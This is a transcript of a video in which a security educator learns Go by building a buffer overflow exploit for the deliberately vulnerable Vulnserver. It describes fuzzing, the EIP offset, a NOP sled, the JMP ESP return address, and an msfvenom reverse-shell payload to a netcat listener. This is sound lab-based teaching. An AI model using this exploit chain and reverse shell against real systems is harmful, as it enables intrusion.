Build A Buffer Overflow Exploit To Learn Golang - Project-Based Learning

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey there everyone greetings and welcome back to my cyber security show today we are going to have some fun learning go Lang that's right where far too long have I pushed off any real programming knowledge and you know I have learned a bit of python I've learned I I know quite a bit of bash that does come in handy from time to time but I I've really been searching for that compiled language that's for me right now and I think golang might very well be that I really regret not learning more programming in the beginning of my career it's really kind of hindered me and now I'm having to play catch-up uh so if you're starting off in I.T or cyber security at all I I just highly recommend you go ahead start learning something python is great I love python I'll never not use Python it's a phenomenal and fantastic uh language to learn golang being you know a compiled Language by nature is something I'm really interested in as well because I want to be able to have I want to be able to build a binary that works no matter what because with python if they don't have python installed well then it doesn't run python right but if I can build an exe I can put it on Windows if I can build an L file I can put it on Linux I can build a Mac file put it on Mac OS so I just want to be able to work with just about anything and easily do that so golang seems to be my choice I used to mess with Nim Lang we had a falling out I'll just leave it there and golang seems to be right along my kind of speed so that's what I'm working with I want to learn more about it so I make a project something I can do get my hands on Focus me get that buy in internally that when I'm I'm doing the thing it's not just here is a variable enjoy the variable well what do I do with a variable um stuff like what kind of stuff can you shut up and hit the I believe button and move on to the next thing okay well I'm I need context man I need something that's going to make me interested in what we are doing not just tell me there's a variable and then I'll eventually use it and hit the I believe button I just don't want to do that I'm not that person so uh I like to put projects in front of me that make me kind of focused in on things and today that is going to be building a buffer overflow exploits for the vulnerable server that by the way links for everything and down below for your enjoyment or if you want to follow the bouncing ball and kind of play along so I've already got Vault server installed I've got immunity debugger installed I've got Mona installed there I all the things I need setup wise for building a buffer overflow again this episode isn't about how to build a buffer overflow or how to do buffer overflows or what overflow overflows are kind of a I'm assuming that it's how can I do that using golang that's what I want to see today man you might pick up a thing or two if you're new to that by just watching but the intent is what do I think about golang how cool was it to learn it how do what's my learning process okay so let's move on let's get into this now I've got a Windows 10 machine here and it is running the vulnerable software you can see this right here this is vulnerable software do not allow access from unrestricted systems right that was just a download I also have immunity so if I need to do anything there honestly it's pretty straightforward but for right now I think we just need the server up and running and then I have parrot OS right here so that we can you know do the golang stuff you can install go on Windows but I'm a Linux guy so there's that you can't hate on me right I don't think I'm centered up let me get get me nice and centered here there we go okay so ultimately I have I can connect to the server if I like so let's do let's do it here if I do NC Dash nvl no no no Envy so used to starting a server not necessarily connecting to one uh and then the IP address 192.168 uh it's was it 56.101 I believe and the default port for the vulnerable server was 999. click that welcome to vulnerable server excellent I can type help I see a bunch of commands trun right here that is the one specifically we are going to be exploiting so if you want to know a bit more about that you can look into uh there's plenty of online resources I believe that the people that I think it's the gray Corner Stephen such and such again links down below uh they have walkthroughs and write-ups all over the Internet this is a very popular uh tool for learning okay but I'm just going to type in exit at this point and goodbye but what's going to be fun is let me do sudo NC Dash nvlp on Port 443 there we go and I will if I do an LS you'll notice I've got these six files right here some of them are named very odd they'll make more sense as we kind of move along but ultimately we've got this exploit.go and that is the the final stage right this is Goku and full Super Saiyan form god mode whatever they call it uh where he's got the like the reddish pink hair or blue I forget which one's more powerful anywho that's the final thing right and if I run it with go run of exploits.go and we see I get a shell oh look at that I can do dir and oh it's so much fun I've I've destroyed it right I'll exit out of there clear this outs but how did I get there and that was cool so I've built this in the past with python I thought this would be a great project for me to do with go and it was it was it was a bit of a learning curve going on there I had to learn a few things about go but having those uh you know challenges those puzzles to tickle my brain and make me go I am I am dug into this I I want to know how the heck do I make that work and why isn't this working and why am I getting that error and so on and so forth right so let's start at the beginning shall we first thing I needed to do was learn how to make a network socket and here is that code in all the Glorious 24 lines of It ultimately like if you take out the spaces and some of the Superfluous stuff it's probably more like 20 20 lines of code right we got package Main that's how you start your go projects at least from what I've learned so far still learning if you're a go programmer out there you know feel free to chime in and explain some of the things that I don't understand quite yet uh happy to have that comments below right get Buckle out uh we're importing some things from the standard library library which are Funt or fmt I think it's format I'm not 100 sure on what Funt stands for I do know that Gophers as they're referred to refer to fmts font okay and then we have net which makes a little bit of sense now how did I know to do that it's called Google ladies and gentlemen I went to the Googs and I looked up I can actually like look and see what did I look up uh golang networking program Network programming docs golang Network programming docs I Googled that which took me to the golang docs when then I saw standard library and was like probably in there so I looked in the standard library and that took me to the net package as I scrolled through I saw a package called net now we know what those are called Nets yes it says package in the standard Library this is where we are this is the documentation that helped me learn this by the way their documentation is really good so here's the overview uh packagenet provides a portable interface for Network i o including TCP ding ding uh UDP domain name resolution and Unix domain sockets although the package provides access to low-level networking Primitives most clients will need only the basic interface provided by the dial listen and accept functions and the associated con and listener interfaces if you you're using crypto TLS package it uses the same type of interface as dial and listen functions so since I only need to I don't actually need to retrieve anything if I wanted to make this more fully featured I would do that so that I could catch the shell as well as like send the exploit but you know netcat's a thing and that's fine again I'm still learning so one step at a time baby steps right what about baby steps baby stepping into golang baby steps into networking programming with golang baby steps so uh the dial function was really all I needed if we look we have a lovely example right here and you'll notice it's going to look a lot like this right here right because we have so we created our first function the main function which I think you need uh in in go I just I'm doing some printing here to give us some like bannering some some you know just make it pretty but here look I've got this Con comma error colon equals net dot dial there's the dial thing that we were just looking at right what do they call that they called it the interfaces the dial and listener interfaces and you'll see it is exactly the same right all the way up to here because we're doing con right was it oh I'm sorry dial is a function con is the interface right so I've got con which is the interface net.dial which is the function which is built into net I call on TCP and I tell it what I want to connect to with either the name or the IP colon Port I wish to connect to then I need to do some error handling because we see this here if error does not equal nil which means there is an error then you handle in whatever way you see fits for me I just saw fit to say hey there was an error connecting and then print that error out using thumped dot print line and that just throw that error in there so this is kind of a catch-all um thing for those errors in this function I just put that out and then just return and then after that I'll make hey f printf which as I learned you can do this fun thing and go which is um I'll do it here if I do go doc I think it's stock or docs and I do fmt.f print F yeah there we go tells you exactly what it it does so here it is if we're an i o writer format string a any you'll notice I can mess with integers and errors formats according to the a2a format specifier and writes to W it Returns the number of bytes written in any uh error encountered and write any error encountered sorry I can't read so if we go back um you'll notice that that's what this was doing it looks like it was sending a get request and then handling anything that came back but I didn't really need that part but I did do a bit of it because I wanted to send like an exit and then just call it a day so that's what I did I sent the exit command and then close make sure that that sucked that connection was closed cool and I learned all that by just reading through this documentation I learned about con if I do control F con I think it's down the page a little bit yeah where is that there it is type con there you go and I just read through this documentation look there's close closes the connection any blocked reader write operations will be unblocked in return errors close what a bing fairly simple so that's all I needed from that and then I was successful at creating a connection with that that moves us to well actually doing something right this is where I needed to start like fuzzing out the the payload okay I need to know where and if I can crash this thing to create a buffer issue obviously I needed a little bit more action going on here now we're obviously familiar with fmt and net but I needed strings I needed OS I needed string conf and we can see I I kind of highlighted why I needed these things with some comments gives me the ability to repeat a string so cool I needed to repeat a string because I want to send a bunch of A's but I don't want to type in a block of A's I just want to say here is the character here's how many of the character I want you to send cool then I've got OS which gives me the ability to use command line arguments because I wanna kinda when I fire this go program off I want to tell it from the command line how many of the care of the a characters I want to send I don't want to have to hard code that and then re-code it I could go into looping and all that but again baby steps right baby steps this was an easier way to do it I could just fire up the program say hey send a thousand days or send two thousand A's or send three thousand A's until I found a crash right because this is what I'm trying to do see how much it can handle before it goes you know you you can't make partner I'm going down I See the Light there's Ma and Paul you know that kind of thing and then stream Str con for string conf needed to convert arguments from strength to integers because what was fun was that the command line argument that I would send it was a number and that number got interpreted as an integer by the I'm sorry as a string even though it's a number it got and so I needed to convert it from a string to an integer to do the formula and we'll see that here okay so scrolling on down we can see there's my con right all the same good old good old right I'm doing TCP just slap the old IP colon port there's our Target basically I could Define that elsewhere but that was easy enough to do it's not a big deal and then down here is where we get into the fun stuff so I did a variable called ARG and this colon equals thing that I saw I've realized that that is hey it's like a shorthand way of telling it I'm giving you a variable I'm going to let you figure out what kind of variable it is and I'm taking os.args and then I put inside of those brackets one that means the first argument after the program is called from the command line that's going to be a command line argument take that one in so it sucks it in that's why I needed that OS Imports then I've got int ARG like this and this is something that might be super weird to anybody like myself that was uninitiated I saw this thing being used as underscore especially when you had like con comma error well if I didn't care about the error I could just put an underscore there and that's what's Happening Here I do believe there's there's an error or something that went within ARG that I didn't really care about so I just put an underscore there and it's just kind of like okay we're not going to deal with that so instead of putting the second part of that I could have done it's R you know either side of that equation could have had that and of course it is being treated as a variable which is going to contain string con dot a2i a2i stands for ASCII to integer which is weird because we're kind of going the other way around right no yes yeah no not asking we are doing ask we are doing ASCII which is a string to an integer which is exactly what we need to do and then I'm sucking in whatever got got brought into Arc so there's the ARG variable bam there it is I'm converting it using a to I now I take that's string of one thousand which was being treated as just like characters it is now the number one thousand and I can use that to do like math or other types of things so now here's my fuzz strings dot repeats it's the reason I needed the strings import and there's my upper character a and now int ARG which is my ARG which has been turned into an integer I feed that in and it can work with it because before I was just doing um the ARG and it was like hey that's a string and I I don't know I can't I can't multiply a by a string you're like you're right can't do that that's pretty smart then I send the payload itself or I make the payload which is the trun command which requires a period after the word trun with the space in between and then I just concatenated the fuzz on the end of it which is going to be the number of A's that I fed the thing right finally I do I send that payload along with the F printf statement and the con and whatever my payload is which will be coming from here and then I can close the connection let's see what happens shall we and basically what I was looking for is a crash condition so if I run if I do I'll clear this and I'll do go run and it is TCP was it send yeah dot go and if I give it like a thousand A's it is not running so there's an error right so my error is working it tells me what the error was was the connection was refused so obviously this isn't running Foolish Boy let's try again shall we firing off all right connected to the Target we see the connection is there it's still running that's great but that wasn't enough obviously okay let's try 2000 Ace connected to the Target looks like it's still running cool let's try uh 3000 A's connected to the Target oh oh it crashy crashy crash crash so there we go I know that I need 3 000 bytes or at least somewhere around that I'm don't I'm not we're too worried about exactly Ace right now because volt Server doesn't really uh make it's not too strange you go got a lot of room to move and learn with so 3000 bytes was enough for us to crash the program and now I know that so I've got that that specific thing now it's just kind of like going along and building all the all the different things that I uh are learning all the different things that I needed to make that work so let's see here the next step in that thing was to find the EIP the EIP is the extended uh um it's it's the it's the register for the pointer right the pointer what what's the next thing that needs to run I'm I'm forgetting off the top of my head I'm blanking out here on what EIP stands for um please don't roast me too hard for that it's just not coming into the old brain today it's like out of ramp um so let's see here to find the EIP I think there were some other things I wanted to show you like how did I learn how to repeat the string it was this article right here that helped me with that's kind of showed me that's and I think yeah here we go I saw that I needed to get strings just Google searched how to repeat a string right not what I put in how to repeat a string with golang I type that into Google and the answer was forthcoming so this person created a variable with a string in it welcome to Geeks for geeks and then then they wanted to repeat that they would say strings.repeat string one comma four so they would want to repeat that four times and it would repeat so that's how I learned that and then to learn how to do command line arguments I did this one which I did a Google search for how to use command line arguments in go lag so I hope you're seeing that like it doesn't have to be super difficult to start picking up new programming you just have to know what it is you need to do and then start searching that out and learning how to Google that is is a skill in and of itself but it should be fairly simple some of them can be a little more elusive than others but uh you'll get better at it as time progresses but this is how I I kind of pick up these new things so I've got that out of the way and then how to convert a string to an integer type which I'm going with how to convert a string to INT in golang was the Google Search right and then it shows me exactly how to do that which was the a to I and there it was all I needed the string conf and then they have this string variable of a hundred and then we see you'll notice it has like an error with this with the ATI and then it changes that into an integer I just underscored the error because I didn't care I don't really need it I don't want to deal with it if I needed to I would okay maybe that was a bad idea but that's what I did all right let's see here back to programming things now I've got I think all the things I needed yet to to figure stuff out I just needed to work with it and start finding that EIP now to do that you're going to go into you know you're going to use the whole uh what is it the what is the name of that stinking there there's a and I just used it my mind is blanking if you ever have one of those days it's one of those days where I'm like my fuel isn't topped off or something and I'm just forgetting stuff so it is the offsets right offset right uh pattern create that's what it is just gotta Engage The Brain so if I do fine slash uh Dash name I'll look for uh pattern underscore create.rb and look for send all the errors to devno where's that at and this is a stock parrot OS install so you should have this as well it's part of the metasplay framework but there you go if I run that pattern creates so slash user share metasplate let us Beloit framework thank you and then it was or was it tools exploit pattern create okay Tools Plus exploit pattern create RB and I tell it the length of three thousand bam it's going to spit this junk out right and from there I can kind of put that in here which is exactly what I did I just made this the payload I don't need all the other stuff at this point I just made that the payload because what I'm trying to do is find out where the EIP is picking up where where so when I send a bunch of A's that's cool but what I need to know is where that EIP is hitting inside of that mass of A's so I give this string it's just pattern which is a you a completely unique string I'll never have a repeating set of characters that gives me the ability to find exactly where that was I would then verify that by sending a bunch of B's along right and that's what we did here you now see I created one called EIP BBB and then when I fire this off and then I'm just like repeating I also create this knob sled knob sleds are a really good idea when you're creating buffer overflow so I just made uh basically like hey go to the next thing that's that's what this instruction does what a knob does it's like no instruction it's just like hey go to the next thing go to the next thing so this X90 is the hex character for doing that and then I told you I want 16 of those and then I created some padding which is going to fill out the rest of the buffer so it continues to crash you know and I just kind of did the math and reduced what I took from here I found this was at 2006. I did that's how did I know it was 2006 well um I actually wrote that down where did I put that oh it's over here I believe I wrote that down didn't I ah but I didn't keep it right well bummer I wrote down that pattern we could do it again but it's just going to take up a lot of time already at 25 minutes right so I just found that EIP spots where exactly it was and it was at 2006 you could do that by doing a pattern offset yeah dot RB tell it the length of three thousand uh and then you give it the actual characters which again yes I did not write those down man I wish I'd write those down but I did not I don't have the file or anything my bad y'all my bad but again the same about how to do buffer overflows this is about doing it with golang all right so that's what all this business is is like saying hey I've got a fuzz which is a bunch of A's do that 2006 times and then I need a variable called EIP which is going to have four B's in it cool then I need a knob sled of 16 x 90 characters there you go fire that off and then pad the rest of it with a bunch of uppercase C's how many of those you want killer well I want 974 of them please and thank you you slap all that stuff together here I am concatenating all that into the payload right so I've got Tron which is just a string and it's period that it requires and let's use the plus character to grab fuzz one the plus character to add uh the EIP then to add the knob sled then to add the padding that is now all wrapped up in the payload ball I send that along Booyah close it out and I can check and see if those if I see that EIP and immunity give me 42 42 42 42 that means I nailed it if it's 41 42 42 42 then I'm off by a bite or two well actually by one if I'm 42 42 42 something else like a c then I know that I've gone the wrong way and I can kind of shift around until I get just the right piece but those two commands from those those pattern create and pattern um offset are usually really good you can also do what's called binary trees to figure this out but it's a lot more involved it's possible to do and it's good to learn but it's it's a it takes a lot more time where does that take us well now that I've verified the EIP I have that then run through immunity looking for um using Mona to figure out what are what is going to be a good memory address that will send to the right register so when you have a I'll bring you in closer to this one I'll explore this and we'll we'll call it a day in when you when you execute a command and you're running it through something like a debugger like immunity that EIP remember I told you it it tells you it's what to do next this is the next thing you should do go here for your next set of instructions well that gets filled with a memory address if I have a memory address that tells the program the next thing to do is at this memory address or this register then it will do that now if through testing I've sent information into a register and I know which register that is which I can do with you know what let's let's just show you this I think that's going to be the right thing to do so let's jump over here and let's fire up a vulnerable server I'll run it as administrator because why not and then I'll run immunity as administrator run as administrator yes let's do that we will whoa CPU you've gone nuts and then I will do file click attach we'll find Vault server click attach and then hit play the little play button at the top and now I will send that that business the the last this what is it X eipverify.go let's send that along and see what it does so I will do go run EIP [Music] verify.go fire it off and let's jump back to here we notice we're going to pause state things have gone horribly awry for this let me to appearance change the font size to something that we can all actually see go to the biggest thing you got hit okay hit okay so you'll notice right around this region I can't highlight it but it's right here we've got the trunk command us there's a bunch of A's in there you'll notice here uh is EIP you'll notice it says 42 42 42 42. the Four B's that I sent along and then if I go to like the E you'll notice we got the registers right we got eax ECX edx ebx ESP EBP so on and so forth if I click on this one on that one's not going to give it to me let's help if I go here and follow and dump I can see that over here in the dump I can scroll down seeing all this action I'm actually going to kind of slide this over make sure that I am showing yeah 16 which is cool it's just kind of big for this you notice there's all those 41s 41 is the ASCII character of the letter A if I keep going oh look at that I see a bunch of C's and that should be in the e s p or register ESP there you go follow and dump and you can see there's my knob sled which is first which right right 90 90 then 43 43 43 there's all those C's so if I can control EIP which I can because I know where it is I can then say hey go to the ESP register the command to do that is Jump ESP that's the assembly code to say go to that register since I can control that I can now control and I would just need to find a um the the memory address in which that code actually exists to jump to ESP which I did using Mona and then I was able to do that okay so let's kill this let's bring up vault server yet again there we go and then we can come back to the code and that does take us to the actual exploits so I needed to pull strings back in here because I needed the ability to repeat a string from time to time because this is the final form you're like whoa look at all that garbage what's going on in here so here is that memory address written in HEX in little ndn format so it's it's actually kind of backwards uh so the memory address was 6250 11 AF so I put that in HEX format which is slash X character right so and I do it backwards so I give the EIP is now instead of Four B's it is slash xaf slash X11 x 50 x 62. that's what you get there nothing has changed there and I just kind of commented out the old bees and said thanks for your help no longer needed knob is the same but you'll notice the padding is a little bit different in the size of it and that's because I created Shell Code I did that using a metasploits the msf Venom right and I believe all I did was I will control C this and clear I believe I just did meta uh msf msf Venom Dan Dash p for the payload this is a Windows slash shell underscore reverse I can spell underscore TCP L host equals and my IP address 102.168.56.102 L port equals uh I put it on 443 because I like to get fancy and then I would do Dash F now I you can do a golang payload which I did try but that didn't work because it's a bytes object and I'm trying to convert it it just it didn't work it it needs that hex looking type of stuff so I just outputted the format as C I also added the bad character of Slash x00 like so that's all you need for this one anything else for us there I think that was about its fire it off and then it spits out your lovely code here momentarily waiting waiting waiting wait come on there let's go it does take a hot second I guess I do have a lot going on on this on this computer but uh feel like it's almost at the station anyway once it that actually works oh there it goes there is that code and I just I didn't technically copy pasta this I did run this through because if you look at the code everything has this like Plus at the end I did some said finagling to kind of format it nicer so I could just literally copy and paste it so I I I think I yeah what I did was I ran through said and I just did a find and replace of what I do I did the regular expression of at the end of each line I wanted to do a space plus but I think I needed to do space slash Plus spaces and things might be considered special characters so I'm just trying to like remove any special characterization do that globally fire it off again and then it's going to take a second it'll come back it took a hot minute last time also the other thing that you know I had to grab was how big it was was 351 bytes and that's why when I look over here at the padding I had to lower it so I just basically did all the math and removed the 351 bytes from the 900 whatever it was before that left me with 623 making sure we still overflow and then if we go back hopefully it's now added all that stuff yep there it is and that way I could just copy and paste that in now one thing I did need to learn was how do I do a multi-line string and there was a couple ways of doing it backticks was one of it obviously I googled this I think I have that here how do you write a multi-line string stack Overflow came to the rescue right and this person is asking hey how do you do multi-line strings and golang and this was the prevailing wind as you can see 1 329 upvotes and check marks green check marked by the um the questioner but that didn't really work well for me it was doing weird things because I think it adds in some white space character stuff that you can't necessarily see but below was another way to do it which was this and that worked perfectly for me and I believe they even talk about how using backlicks of backlicks back ticks it will preserve Escape characters but the plus we may be on the leading line so on and so forth so I was like oh okay so there's something going on because I was seeing these weird periods in the dump of immunity because it wasn't it wasn't working so that was the key to it right there and that allowed me to create the Shell Code variable and then just copy pasta in there now I have parentheses around it I did that accidentally but it still works so I just left it in you know you don't work with things though you don't mess with things that work then we build the payload right Tron fuzz EIP knob sled Shell Code padding fire and forget and of course that brings us back to it is waiting where we can create our listener so sudo NC Dash nvlp on 443 type in my password I don't know if I did that right hey look at that it's going and then we do go run exploit.go and bada bing we get ourselves a shell and that ladies and gentlemen is how you learn some golang at least in my estimation hopefully that is helpful to you maybe even motivating to get you out there Learn Python learn goat link learn C learn Powershell learn bash learn anything get yourself familiar with the fundamentals of programming pick a language and just start using it if you have if you're deep into your it career or cyber security career it doesn't matter it's never too late to go ahead and start learning this stuff it becomes super useful especially when you're doing things like web application pen testing or I need to build a tool that does something for me it's super super useful so I highly recommend just bite the bullet figure out some projects that would be interesting to you to you know that you would want to build like build something like a port scanner or uh you know host Discovery thing I don't care that those things already exist they're just fun to build because you're invested you kind of know how it's supposed to work so you got that going on now you just got to figure out the logic and how that works inside of the programming language which you have chosen I like golang as you can see it was pretty straightforward in a lot of ways it wasn't too difficult for me to get this up and running so hopefully that's a you know a big burn you're saddled to go you know use golang or use python or use whatever that's that's what it is so if you liked what you saw thanks for watching everyone click that like And subscribe down there it really helps the channel promotes it in the algorithm leave a comment I love hearing like hey man this was awesome I I I'm gonna go learn a language today excellent I'll even try to help you troubleshoot stuff if I can down in the comments I'll I try to comment with everybody that comments so leave me a comment below I love talking with you good Folks Gotta buy me a coffee link as well so if you want to contribute and help me buy things like shirts and invest into the show we can do that that seems to be the end of it today there you go ladies and gents thanks again for watching we're gonna call it until next time keep hacking

Info

Channel: Daniel Lowrie

Views: 1,832

Rating: undefined out of 5

Keywords: ethicalhacking, pentesting, cybersecurity, kalilinux, linux, parrotsecurity, parrotlinux, hacking, hacker, bugbounty, owasp, owasptop10, webappsecurity, webapplicationsecurity, applicationsecurity, appsec, infosec, informationsecurity, learn, hackerone, bugcrowd, ethicalhacker, cybersec, ejpt, pentest, pentester, redteam, redteaming, blueteam, cti, powershell, golang, information security, application security, buffer overflow, programming, ethical hacking, ethical hacker, kali linux, parrot linux, parrot os, go

Id: c7hLUsUE_Ao

Channel Id: undefined

Length: 40min 1sec (2401 seconds)

Published: Fri Jun 09 2023